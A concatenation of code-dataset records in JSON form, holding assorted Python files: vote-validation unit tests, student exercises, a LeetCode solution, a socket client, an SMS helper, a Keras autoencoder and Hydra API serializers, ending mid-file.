voter, messages = self.get_context()\n\n vote = voter.mk_genuine_vote()\n adapted = adapt_vote(cryptosys, deepcopy(vote))\n try:\n assert adapted == validator.adapt_vote(vote)\n messages.append('[+] Vote successfully adapted')\n except AssertionError:\n err = 'Vote wrongly adapted'\n self.__fail(err)\n\n\n def mk_vote_adaptment_failures(self):\n \"\"\"\n \"\"\"\n election, cryptosys, validator, voter, messages = self.get_context()\n\n failures = []\n for index, msg in enumerate((\n 'Wrong or extra content',\n 'Malformed content',\n 'Cryptosystem mismatch',\n 'Election key mismatch',\n )):\n vote = voter.mk_genuine_vote()\n if index == 0:\n vote.update({'extra_key': 0})\n elif index == 1:\n del vote['encrypted_ballot']\n elif index == 2:\n vote['encrypted_ballot']['modulus'] += 1\n elif index == 3:\n vote['encrypted_ballot']['public'] += 1\n failures.append((msg, vote))\n return failures\n\n\n def test_vote_adaptment_failures(self):\n \"\"\"\n \"\"\"\n election, cryptosys, validator, voter, messages = self.get_context()\n\n failures = self.mk_vote_adaptment_failures()\n for err, vote in failures:\n with self.subTest(err=err, vote=vote):\n try:\n validator.adapt_vote(vote)\n except InvalidVoteError:\n messages.append(f'[+] No adaptment: {err} successfully detected')\n else:\n self.__fail(f'Wrong adaptment: {err} failed to be detected')\n\n\n def test_genuine_vote_validation_success(self):\n _, cryptosys, validator, voter, messages = self.get_context()\n\n vote = voter.mk_genuine_vote()\n vote = adapt_vote(cryptosys, vote)\n try:\n validator.validate_genuine_vote(vote)\n messages.append('[+] Vote: Successfully validated')\n except InvalidVoteError:\n err = 'Valid vote erroneously invalidated'\n self.__fail(err)\n\n\n def test_genuine_vote_validation_failures(self):\n _, cryptosys, validator, voter, messages = self.get_context()\n\n err = 'Invalid vote failed to be detected'\n for kwargs, msg in (\n ({'corrupt_proof': True}, 'invalid encryption'),\n ({'corrupt_fingerprint': True}, 'fingerprint mismatch'),\n ):\n vote = voter.mk_genuine_vote(**kwargs)\n with self.subTest(vote=vote):\n vote = adapt_vote(cryptosys, vote)\n try:\n validator.validate_genuine_vote(vote)\n except InvalidVoteError:\n messages.append(f'[+] Vote: Invalid detected ({msg})')\n else:\n self.__fail(f'{err} ({msg})')\n\n\n def test_audit_vote_validation_success(self):\n _, cryptosys, validator, voter, messages = self.get_context()\n\n audit_vote = voter.mk_audit_vote()\n audit_vote = adapt_vote(cryptosys, audit_vote)\n missing, failed = validator.validate_audit_votes(audit_votes=[audit_vote,])\n try:\n assert not missing and not failed\n messages.append('[+] Audit-vote: Successfully validated')\n except AssertionError:\n err = 'Valid audit-vote erroneously invalidated'\n self.__fail(err)\n\n\n def test_audit_vote_validation_failures(self):\n election, cryptosys, validator, voter, messages = self.get_context()\n\n err = 'Invalid audit-vote failed to be detected'\n for kwargs, msg in (\n ({'missing': True}, 'missing secret'),\n ({'corrupt_proof': True}, 'invalid encryption'),\n ({'corrupt_alpha': True}, 'invalid secret'),\n ({'corrupt_encoding': True}, 'max-gamma exceeded'),\n ):\n if msg == 'max-gamma exceeded':\n # ~ Dramatically reduce the number of candidates so that\n # ~ decrypting the ballot with the voter's secret\n # ~ exceeds max-gamma encoding of their number\n save_candidates = election.get_candidates()\n election.set_candidates(save_candidates[:1])\n fake_nr_candidates = len(election.get_candidates())\n kwargs.update({'fake_nr_candidates': fake_nr_candidates})\n audit_vote = voter.mk_audit_vote(**kwargs)\n with self.subTest(audit_vote=audit_vote):\n audit_vote = adapt_vote(cryptosys, audit_vote)\n missing, failed = validator.validate_audit_votes((audit_vote,))\n try:\n if msg == 'missing secret':\n assert missing == [audit_vote,] and not failed\n else:\n assert not missing and failed == [audit_vote,]\n messages.append(f'[+] Audit-vote: Invalid detected ({msg})')\n except AssertionError:\n self.__fail(f'{err} ({msg})')\n if msg == 'max-gamma exceeded':\n election.set_candidates(save_candidates) # Restore for subsequent tests\n\n\nif __name__ == '__main__':\n print('\\n====================== Testing vote validations ======================')\n unittest.main()\n","sub_path":"tests/election/interfaces/test_vote_validation.py","file_name":"test_vote_validation.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"572605460","text":"import math\n\n\n# Zad1\n\n\nclass Point:\n @property\n def x(self):\n return self.__x\n\n @x.setter\n def x(self, val):\n self.__x = val\n\n @property\n def y(self):\n return self.__y\n\n @y.setter\n def y(self, val):\n self.__y = val\n\n def __init__(self):\n self.x = 0\n self.y = 0\n\n\n# punkt = Point()\n# punkt.x = 12\n# print(punkt.x)\n\n\n# Zad2\n\ndef dek(punkt1, punkt2):\n def dek2(fun):\n def inner(p1, p2):\n if punkt1 <= p1.x <= punkt2 and punkt1 <= p1.y <= punkt2 and punkt1 <= p2.x <= punkt2 and punkt1 <= p2.y <= punkt2:\n return fun(p1, p2)\n else:\n raise ArithmeticError\n\n return inner\n\n return dek2\n\n\n@dek(-5, 5)\ndef add(p1, p2):\n p = Point()\n p.x = p1.x + p2.x\n p.y = p1.y + p2.y\n return p\n\n\np1 = Point()\np2 = Point()\np1.x = 12\np1.y = -12\n\np2.x = -2\np2.y = 2\n\n# print(add(p1, p2))\nprint(add(p2, p2))\n\n\n@dek(-5, 5)\ndef sub(p1, p2):\n p = Point()\n p.x = p1.x - p2.x\n p.y = p1.y - p2.y\n return p\n\n\n# print(sub(p2, p1))\nprint(sub(p2, p2))\n\n\n# Zad3\n\n\nclass Zad3():\n\n @staticmethod\n def count_area(p1, p2, p3, p4=None):\n if p4 is None:\n a = math.sqrt(math.pow(p1.x - p2.x, 2) + math.pow(p1.y - p2.y, 2))\n b = math.sqrt(math.pow(p2.x - p3.x, 2) + math.pow(p2.y - p3.y, 2))\n c = math.sqrt(math.pow(p3.x - p1.x, 2) + math.pow(p3.y - p1.y, 2))\n p = a + b + c\n return math.sqrt(p * (p - a) * (p - b) * (p - c))\n else:\n a = math.sqrt(math.pow(p1.x - p2.x, 2) + math.pow(p1.y - p2.y, 2))\n b = math.sqrt(math.pow(p2.x - p3.x, 2) + math.pow(p2.y - p3.y, 2))\n c = math.sqrt(math.pow(p3.x - p4.x, 2) + math.pow(p3.y - p4.y, 2))\n d = math.sqrt(math.pow(p4.x - p1.x, 2) + math.pow(p4.y - p1.y, 2))\n p = a + b + c + d\n return math.sqrt((p - a) * (p - b) * (p - c) * (p - d))\n\n @staticmethod\n def count_obwod(p1, p2, p3, p4=None):\n if p4 is None:\n a = math.sqrt(math.pow(p1.x - p2.x, 2) + math.pow(p1.y - p2.y, 2))\n b = math.sqrt(math.pow(p2.x - p3.x, 2) + math.pow(p2.y - p3.y, 2))\n c = math.sqrt(math.pow(p3.x - p1.x, 2) + math.pow(p3.y - p1.y, 2))\n return a + b + c\n else:\n a = math.sqrt(math.pow(p1.x - p2.x, 2) + math.pow(p1.y - p2.y, 2))\n b = math.sqrt(math.pow(p2.x - p3.x, 2) + math.pow(p2.y - p3.y, 2))\n c = math.sqrt(math.pow(p3.x - p4.x, 2) + math.pow(p3.y - p4.y, 2))\n d = math.sqrt(math.pow(p4.x - p1.x, 2) + math.pow(p4.y - p1.y, 2))\n return a + b + c + d\n\n\np3 = Point()\np3.x = 1\np3.y = 2\np4 = Point()\np4.x = 50\np4.y = 8\n\nprint(Zad3.count_obwod(p1, p2, p3))\nprint(Zad3.count_obwod(p1, p2, p3, p4))\n\nprint(Zad3.count_area(p1, p2, p3))\nprint(Zad3.count_area(p1, p2, p3, p4))\n\n\n# Zad4\n\n\nclass Zad4:\n counter = {}\n\n def __init__(self, fun):\n self.fun = fun\n Zad4.counter[fun] = 0\n\n def __call__(self, *args, **kwargs):\n Zad4.counter[self.fun] += 1\n self.fun(*args, **kwargs)\n\n @staticmethod\n def print_counter_static():\n for k, val in Zad4.counter.items():\n print(k, val)\n\n@Zad4\ndef fun1():\n pass\n\n@Zad4\ndef fun2():\n pass\n\n@Zad4\ndef fun3():\n pass\n\n\nfor i in range(120):\n fun1()\n for j in range(2):\n fun2()\n for k in range(9):\n fun3()\n\nprint(Zad4.print_counter_static())","sub_path":"Lab13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"549805628","text":"\ndef decode(array, alphabet):\n return int(array in alphabet)\n\ndef num_ways(array, alphabet):\n array_len = len(array)\n ret = 0\n if array in alphabet:\n ret = 1\n #endif\n \"\"\" if array_len = 1, we cannot split it more \"\"\"\n if array_len == 1:\n return ret\n #endif\n for x in range(1, array_len):\n \"\"\" \n num_ways(---) -> \n 1: decode(-) + num_ways(--)\n 2: decode(--) + num_ways(-)\n \"\"\"\n ret += decode(array[x:], alphabet) * num_ways(array[:x], alphabet) \n #endif\n return ret\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"212070446","text":"#\n# [250] Count Univalue Subtrees\n#\n# https://leetcode.com/problems/count-univalue-subtrees/description/\n#\n# algorithms\n# Medium (44.41%)\n# Total Accepted: 23.7K\n# Total Submissions: 53.5K\n# Testcase Example: '[5,1,5,5,5,null,5]'\n#\n# Given a binary tree, count the number of uni-value subtrees.\n#\n# A Uni-value subtree means all nodes of the subtree have the same value.\n#\n# Example :\n#\n#\n# Input: root = [5,1,5,5,5,null,5]\n#\n# ⁠ 5\n# ⁠ / \\\n# ⁠ 1 5\n# ⁠ / \\ \\\n# ⁠ 5 5 5\n#\n# Output: 4\n#\n#\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def countUnivalSubtrees(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if root is None:\n return 0\n self.res = 0\n self.DFS(root)\n return self.res\n\n def DFS(self, root):\n if root.left is None and root.right is None:\n self.res += 1\n return True\n if root.left is not None and root.right is not None:\n L, R = self.DFS(root.left), self.DFS(root.right)\n if L and R and root.left.val == root.val and root.right.val == root.val:\n self.res += 1\n return True\n elif root.left is not None:\n L = self.DFS(root.left)\n if L and root.left.val == root.val:\n self.res += 1\n return True\n elif root.right is not None:\n R = self.DFS(root.right)\n if R and root.right.val == root.val:\n self.res += 1\n return True\n return False\n","sub_path":"250.count-univalue-subtrees.python3.py","file_name":"250.count-univalue-subtrees.python3.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"522418444","text":"#Comma-con: takes a list and inserts commas and 'and' and outputs a string\r\n\r\ndef commaCode(values):\r\n s = ''\r\n for i in range(0, len(values) - 1):\r\n s += str(values[i]) + ', '\r\n s += 'and ' + str(values[len(values) - 1])\r\n return s\r\n\r\nvalues = [1, 2, 3, 4]\r\nresult = commaCode(values)\r\nprint(result)\r\n","sub_path":"TutFile6.py","file_name":"TutFile6.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"419256298","text":"\n# Library imports\nimport cv2\nimport numpy as np\n\n# System imports\nfrom system_manager.constants import Constants\n\nclass Transform(Constants):\n\n def __init__(self):\n \n super().__init__()\n\n def inv_map(self, frame):\n \"\"\"\n Transforms given image to top-view image (used for visual debug)\n :frame: front-view image\n :returns: transformation matrix and transformed image\n \"\"\"\n \n image = cv2.warpPerspective(frame, self.M, self.TOP_VIEW_IMAGE_DIMENSION, flags=cv2.INTER_LINEAR)\n \n return image, self.M\n\n \n def convertBack(self, x, y, w, h):\n \"\"\"\n Converts detections output into x-y coordinates\n :x, y: position of bounding box\n :w, h: height and width of bounding box\n \"\"\"\n \n xmin = int(round(x - (w / 2)))\n xmax = int(round(x + (w / 2)))\n ymin = int(round(y - (h / 2)))\n ymax = int(round(y + (h / 2)))\n return xmin, ymin, xmax, ymax\n\n def get_inv_coor_different_boundary(self,detections):\n \"\"\"\n Converts front-view coordinates (of cone) to top-view coordinates\n :detections: front-view coordinates\n :M: transformation matrix\n :returns: top-view coordinates of cones and person\n \"\"\"\n \n blue = []\n orange = []\n \n for detection in detections:\n x, y, w, h = detection[2][0],\\\n detection[2][1],\\\n detection[2][2],\\\n detection[2][3]\n xmin, ymin, xmax, ymax = self.convertBack(\n float(x), float(y), float(w), float(h))\n pt1 = (xmin, ymin)\n pt2 = (xmax, ymax)\n \n a = np.array([[( (xmax+xmin)//2 ), (ymax//1)]], dtype='float32')\n a = np.array([a])\n pointsOut = cv2.perspectiveTransform(a, self.M)\n box = int(pointsOut[0][0][0]), int(pointsOut[0][0][1])\n \n if(detection[0] == 'blue'):\n blue.append(box)\n else:\n orange.append(box)\n \n blue = sorted(blue, key=lambda k:(k[1], k[0])).copy()\n orange = sorted(orange, key=lambda k:(k[1], k[0])).copy()\n\n return blue[::-1], orange[::-1]\n\n\n","sub_path":"src/localization/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"473678666","text":"# coding:utf-8\n__author__ = 'jesse'\n\nimport requests\nimport ujson\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef send_message(mobile, text, sign=u'你有课'):\n \"\"\"\n (云片网络)发送短信windy.yang@huanxunedu.com/0o9i8765\n :param\n mobile -- (str/unicode)手机号码\n text -- (str/unicode)短信内容\n sign -- (str/unicode)签名,除非您清楚您的签名可以发送成功,否则请留空,缺省为'在线外教',不需要'【】'符号\n :return\n (dict){\n rlt -- (bool)发送成功或失败\n code -- (int)返回状态码\n msg -- (str)状态说明\n success_count -- (int)发送成功数量\n }\n \"\"\"\n url = u'http://yunpian.com/v1/sms/send.json'\n apikey = u'f9d1660d31218d4dadb0bac4558df221'\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\n sign = u'【' + sign + u'】'\n post_data = dict(apikey=apikey,\n mobile=mobile,\n text=sign+text)\n response = requests.post(url, data=post_data, headers=headers)\n if response.status_code == 200:\n rs = ujson.loads(response.content)\n if rs.get('code') == 0:\n return dict(rlt=True,\n code=0,\n msg='success',\n success_count=rs.get('result').get('count'))\n else:\n logger.info(\"API send_message failed, info: %s\", rs.get('msg'))\n return dict(rlt=False,\n code=rs.get('code'),\n msg=rs.get('msg'),\n success_count=rs.get('result').get('count'))\n else:\n logger.info(\"API send_message failed, info: %s\", response.status_code)\n return dict(rlt=False,\n code=response.status_code,\n msg='API %s HTTP Status Error' % url,\n success_count=0)\n","sub_path":"api_master_v2/app_core/thirdpart/message_yunpian.py","file_name":"message_yunpian.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"346474186","text":"\n\ndef bubble_sort_ascending(l):\n n = len(l)\n for i in range(n):\n for j in range(1,n-i):\n if l[j] < l[j-1]:\n l[j], l[j-1] = l[j-1], l[j]\n print(l)\n\n\n\nl = [2154,65,25,3,74,3,2422]\nbubble_sort_ascending(l)\nprint(l)\n\n\n","sub_path":"bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"497101637","text":"import numpy as np\n\nfrom keras.datasets import cifar10\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.optimizers import RMSprop\nfrom keras.utils import np_utils\nimport keras.layers.convolutional as kcnn\n# set this to false once you have tested your code!\n# TEST = True\n\n# function to read in and process the cifar-10 data; set the\n# number of classes you want\ndef load_data(nclass):\n (X_train, y_train), (X_test, y_test) = cifar10.load_data()\n X_train = X_train.astype('float32')\n X_test = X_test.astype('float32')\n X_train /= 255\n X_test /= 255\n # down-sample to three classes\n X_train = X_train[(y_train < nclass).reshape(50000)]\n y_train = y_train[(y_train < nclass).reshape(50000)]\n X_test = X_test[(y_test < nclass).reshape(10000)]\n y_test = y_test[(y_test < nclass).reshape(10000)]\n # create responses\n Y_train = np_utils.to_categorical(y_train, nclass)\n Y_test = np_utils.to_categorical(y_test, nclass)\n if TEST:\n X_train = X_train[:1000]\n Y_train = Y_train[:1000]\n X_test = X_test[:1000]\n Y_test = Y_test[:1000]\n return X_train, Y_train, X_test, Y_test\n\n\n# Note: You'll need to do this manipulation to construct the\n# output of the autoencoder. This is because the autoencoder\n# will have a flattend dense layer on the output, and you need\n# to give Keras a flatted version of X_train\nTEST = True\n(X_train, Y_train, X_test, Y_test) = load_data(2)\nprint(X_test.shape)\nprint(Y_test.shape)\n# apply a 2x2 convolution with 64 output filters on a 256x256 image:\nX_train_auto_output = X_train.reshape(X_train.shape[0], 3072)\ndef copy_freeze_model(model, nlayers = 1):\n new_model = Sequential()\n for l in model.layers[:nlayers]:\n l.trainable = False\n new_model.add(l)\n return new_model\n\nfor i in range(1):\n model = Sequential()\n k_size = 3\n model.add(kcnn.Convolution2D(32, k_size, k_size, border_mode='same', input_shape=(3, 32, 32)))\n model.add(kcnn.MaxPooling2D(pool_size=(2,2)))\n model.add(Activation('relu'))\n\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(3072))\n # model.add(Activation('softmax'))\n\n rms = RMSprop()\n model.compile(loss='mse', optimizer=rms)\n model.fit(X_train, X_train_auto_output, batch_size=32, nb_epoch=25, verbose=1,\n show_accuracy=True, validation_split=0.2)\n print('2: %d\\nClassifcation rate %02.3f\\n\\n' % (\n 1, model.evaluate(X_test, X_test.reshape(X_test.shape[0], 3072)\n , show_accuracy=True)[1]))\n\n model = copy_freeze_model(model, 3)\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(2))\n model.add(Activation('softmax'))\n\n rms = RMSprop()\n model.compile(loss='categorical_crossentropy', optimizer=rms)\n model.fit(X_train, Y_train, batch_size=32, nb_epoch=25, verbose=1,\n show_accuracy=True, validation_split=0.2)\n print('2: %d\\nClassifcation rate %02.3f\\n\\n' % (\n 1, model.evaluate(X_test, Y_test)))\n\n\n\n\n","sub_path":"ws362_pset07/pset070302.py","file_name":"pset070302.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"111166080","text":"from socket import *\n\nHOST = '127.0.0.1'\nPORT = 21567\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\ns = socket(AF_INET, SOCK_STREAM)\ns.connect(ADDR)\n\nwhile True:\n data = input('> ')\n s.send(bytes(data, 'utf-8'))\n data = s.recv(BUFSIZ)\n print(str(data, 'utf-8'))\n\n\n\n\n\n\n","sub_path":"net/socket/Client_Server/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"480591337","text":"import re\n\nimport logging\nfrom unidecode import unidecode\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass Constants:\n __NOT_FOUND__ = 'Not Found'\n __EMPTY__ = ''\n\ndef remove_unicode(s):\n k = []\n if isinstance(s, list):\n for item in s:\n pure_string = None\n if isinstance(item, list):\n pure_string = remove_unicode(item)\n k = k + pure_string\n else:\n pure_string = remove_unicode_from_string(item)\n if not pure_string.strip() is None:\n k.append(pure_string)\n return k\n else:\n return remove_unicode_from_string(s)\n\n'''\nReplaces unicode with a space.\n'''\ndef remove_unicode_from_string(s):\n # convert any unicode punctations.\n punctuation = {0x2018:0x27, 0x2019:0x27, 0x201C:0x22, 0x201D:0x22}\n s2 = s.translate(punctuation)\n return ''.join([i if ord(i) < 128 else ' ' for i in s2])\n\n'''\nReplaces multiple tabs with a space.\nThis processes lists recursively too.\n'''\ndef remove_tabs_spaces(s):\n k = []\n if isinstance(s, list):\n for item in s:\n if isinstance(item, list):\n pure_string = remove_tabs_spaces(item)\n k = k + pure_string\n else:\n pure_string = re.sub('\\t+', ' ', item).strip()\n if not pure_string is None:\n k.append(pure_string)\n return k\n else:\n return re.sub('\\t+', ' ', s).strip()\n\n\ndef escape_text(s):\n k = s.replace('\"','\\\\\"')\n k = k.replace(\"'\",\"\\\\'\")\n return k","sub_path":"news/news/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"80873697","text":"import os\r\n\r\ndef fib_sequence(num):\r\n if num == 0:\r\n seq = []\r\n if num == 1:\r\n seq = [1]\r\n if num == 2:\r\n seq = [1, 1]\r\n if num >= 3:\r\n seq = [1, 1]\r\n for i in range(num-2):\r\n seq.append(seq[-1]+seq[-2])\r\n return seq\r\n\r\ndef cls():\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n\r\ndef startup():\r\n cls()\r\n print('Welcome to the Fibonnaci sequence generator!')\r\n global user_input\r\n while True:\r\n try:\r\n user_input = int(input('How many numbers do you want in the Fibonnaci sequence? '))\r\n break\r\n except ValueError:\r\n print('\\nPlease write a valid number!')\r\n\r\nif __name__ == '__main__':\r\n while True:\r\n startup()\r\n print('\\nYour sequence is:')\r\n print(fib_sequence(user_input))\r\n while True:\r\n repeat = input('Do you want to try again with a different length? [y/n] ').lower()\r\n if repeat == 'y' or 'n':\r\n break\r\n if repeat == 'n':\r\n break\r\n","sub_path":"exercise13.py","file_name":"exercise13.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"209761345","text":"from rest_framework.reverse import reverse\n\ndef getHydraVocab():\n context = {\n \"hydra\": \"http://www.w3.org/ns/hydra/core#\",\n \"ApiDocumentation\": \"hydra:ApiDocumentation\",\n \"property\": {\n \"@id\": \"hydra:property\",\n \"@type\": \"@id\"\n },\n \"readonly\": \"hydra:readonly\",\n \"writeonly\": \"hydra:writeonly\",\n \"supportedClass\": \"hydra:supportedClass\",\n \"supportedProperty\": \"hydra:supportedProperty\",\n \"supportedOperation\": \"hydra:supportedOperation\",\n \"method\": \"hydra:method\",\n \"expects\": {\n \"@id\": \"hydra:expects\",\n \"@type\": \"@id\"\n },\n \"returns\": {\n \"@id\": \"hydra:returns\",\n \"@type\": \"@id\"\n },\n \"statusCodes\": \"hydra:statusCodes\",\n \"code\": \"hydra:statusCode\",\n \"rdf\": \"http://www.w3.org/1999/02/22-rdf-syntax-ns#\",\n \"rdfs\": \"http://www.w3.org/2000/01/rdf-schema#\",\n \"label\": \"rdfs:label\",\n \"Class\": \"hydra:Class\",\n \"description\": \"rdfs:comment\",\n \"domain\": {\n \"@id\": \"rdfs:domain\",\n \"@type\": \"@id\"\n },\n \"range\": {\n \"@id\": \"rdfs:range\",\n \"@type\": \"@id\"\n },\n \"Operation\": \"hydra:Operation\",\n \"subClassOf\": {\n \"@id\": \"rdfs:subClassOf\",\n \"@type\": \"@id\"\n }\n }\n return context\n\nDEFAULT_HYDRA_PREFIX = \"hydra\"\n\nclass HydraReservedWords():\n\n def __init__(self, prefix=DEFAULT_HYDRA_PREFIX, connector=\":\"):\n self.HYDRA_PREFIX = prefix\n self.CONNECTOR = connector\n\n self.ApiDocumentation = self.HYDRA_PREFIX + self.CONNECTOR + \"ApiDocumentation\"\n self.supportedClass = self.HYDRA_PREFIX + self.CONNECTOR + \"supportedClass\"\n\n self.property = self.HYDRA_PREFIX + self.CONNECTOR + \"property\"\n self.required = self.HYDRA_PREFIX + self.CONNECTOR + \"required\"\n self.readable = self.HYDRA_PREFIX + self.CONNECTOR + \"readable\"\n self.writeable = self.HYDRA_PREFIX + self.CONNECTOR + \"writeable\"\n\n self.title = self.HYDRA_PREFIX + self.CONNECTOR + \"title\"\n self.method = self.HYDRA_PREFIX + self.CONNECTOR + \"method\"\n self.expects = self.HYDRA_PREFIX + self.CONNECTOR + \"expects\"\n self.returns = self.HYDRA_PREFIX + self.CONNECTOR + \"returns\"\n self.possibleStatus = self.HYDRA_PREFIX + self.CONNECTOR + \"statusCode\"\n\n self.createResourceOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"CreateResourceOperation\"\n self.replaceResourceOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"ReplaceResourceOperation\"\n self.deleteResourceOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"DeleteResourceOperation\"\n self.resourceOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"Operation\"\n\n self.Class = self.HYDRA_PREFIX + self.CONNECTOR + \"Class\"\n self.description = self.HYDRA_PREFIX + self.CONNECTOR + \"description\"\n\n self.suportedProperty = self.HYDRA_PREFIX + self.CONNECTOR + \"suportedProperty\"\n self.suportedOperation = self.HYDRA_PREFIX + self.CONNECTOR + \"suportedOperation\"\n\n\nclass HydraPropertySerializer:\n\n h = HydraReservedWords()\n\n def __init__(self):\n self._data = []\n\n def createProperties(self):\n pass\n\n def getTypeID(self):\n return \"@id\"\n\n def getTypeBoolean(self):\n return \"http://schema.org/Boolean\"\n\n def getTypeFloat(self):\n return \"http://schema.org/Float\"\n\n def getTypeInteger(self):\n return \"http://schema.org/Integer\"\n\n def getTypeString(self):\n return \"http://schema.org/Text\"\n\n def getTypeDate(self):\n return \"http://schema.org/Date\"\n\n def getTypeDateTime(self):\n return \"http://schema.org/DateTime\"\n\n def getTypeTime(self):\n return \"http://schema.org/Time\"\n\n def addProperty(self, name=\"\", type=\"\", required=False, readable=False, writeable=False):\n property = {\n #\"@type\": type,\n self.h.property: name,\n self.h.required: required,\n self.h.readable: readable,\n self.h.writeable: writeable,\n }\n self._data.append(property)\n\n @property\n def data(self):\n self.createProperties()\n return self._data\n\n\nclass HydraMethodSerializer:\n\n h = HydraReservedWords()\n\n def __init__(self):\n self._data = []\n\n def createMethods(self):\n pass\n\n def getCreateName(self):\n return \"POST\"\n\n def getUpdateName(self):\n return \"PUT\"\n\n def getDeleteName(self):\n return \"DELETE\"\n\n def getRetrieveName(self):\n return \"GET\"\n\n def addDefaultCreateOperation(self, id=\"\", expects=\"\", returns=\"\", possible_status=[]):\n method = {\n #\"@id\": id,\n \"@type\": self.h.createResourceOperation,\n self.h.title: \"Create\",\n self.h.method: \"POST\",\n self.h.expects: expects,\n self.h.returns: returns,\n self.h.possibleStatus: possible_status\n }\n self._data.append(method)\n\n def addDefaultUpdateOperation(self, id=\"\", expects=\"\", returns=\"\", possible_status=[]):\n method = {\n #\"@id\": id,\n \"@type\": self.h.replaceResourceOperation,\n self.h.title: \"Update\",\n self.h.method: \"PUT\",\n self.h.expects: expects,\n self.h.returns: returns,\n self.h.possibleStatus: possible_status\n }\n self._data.append(method)\n\n def addDefaultDeleteOperation(self, id=\"\", possible_status=[]):\n method = {\n #\"@id\": id,\n \"@type\": self.h.deleteResourceOperation,\n self.h.title: \"Delete\",\n self.h.method: \"DELETE\",\n self.h.expects: \"\",\n self.h.returns: \"\",\n self.h.possibleStatus: possible_status\n }\n self._data.append(method)\n\n def addCustomOperation(self, id=\"\", type=\"\", title=\"Default\", httpMethod=\"GET\", expects=\"\", returns=\"\", possible_status=[]):\n method = {\n #\"@id\": id,\n \"@type\": self.h.resourceOperation,\n self.h.title: title,\n self.h.method: httpMethod,\n self.h.expects: expects,\n self.h.returns: returns,\n self.h.possibleStatus: possible_status\n }\n self._data.append(method)\n\n @property\n def data(self):\n self.createMethods()\n return self._data\n\n# remember of case using authentication\nclass HydraClassSerializer():\n\n h = HydraReservedWords()\n\n def __init__(self, request=None):\n self.request = request\n\n self._data = {}\n\n self.class_name = None\n self.is_collection = False\n self.context = \"\"\n self.description = \"\"\n\n def createProperties(self, property_serializer):\n pass\n\n def createMethods(self, method_serializer):\n pass\n\n # use this to create the entire hydra class. Overwrite this method in child class\n def createMetadata(self):\n self.baseStructure()\n\n property_serializer = HydraPropertySerializer()\n self.createProperties(property_serializer)\n self._data[self.h.suportedProperty] = property_serializer.data\n\n method_serializer = HydraMethodSerializer()\n self.createMethods(method_serializer)\n self._data[self.h.suportedOperation] = method_serializer.data\n\n def baseStructure(self):\n class_name = self.getTitle()\n if self.class_name is None:\n id = \"\"\n else:\n id = reverse('context:detail', args=[self.class_name], request=self.request)\n base = {\n \"@context\": self.getContext(),\n \"@id\": id,\n \"@type\": self.h.Class,\n self.h.title: class_name,\n self.h.description: self.description,\n self.h.suportedProperty: [],\n self.h.suportedOperation: []\n }\n self._data = base\n\n def getClassTitle(self):\n if self.class_name is not None:\n return self.class_name\n else:\n return \"\"\n\n def getTitle(self):\n if self.is_collection:\n return self.getClassTitle()+\"Collection\"\n else:\n return self.getClassTitle()\n\n @property\n def data(self):\n self.createMetadata()\n return self._data\n\n def getContext(self):\n hydraVocab = {\n self.h.HYDRA_PREFIX: reverse('hydra:hydravocab', request=self.request)\n }\n return hydraVocab\n\n\nclass HydraAPISerializer():\n\n _data = {}\n h = HydraReservedWords()\n\n vocab = \"\"\n classes_serializers = ()\n\n def createBase(self):\n id = reverse('documentation:listHydra')\n\n data = {\n \"@context\": \"\",\n \"@id\": id,\n \"@type\": self.h.ApiDocumentation,\n self.h.supportedClass: \"\"\n }\n\n self._data = data\n\n def createMetadata(self):\n self.createBase()\n self._data[self.h.supportedClass] = self.getClassesData()\n self._data[\"@context\"] = self.getContext()\n\n def getContext(self):\n return getHydraVocab()\n\n def getClassesData(self):\n classesData = []\n for aClass in self.classes_serializers:\n aInstance = aClass()\n classesData.append(aInstance.data)\n return classesData\n\n def getClassData(self, class_name):\n aClass = None\n for oneClass in self.classes_serializers:\n temp = 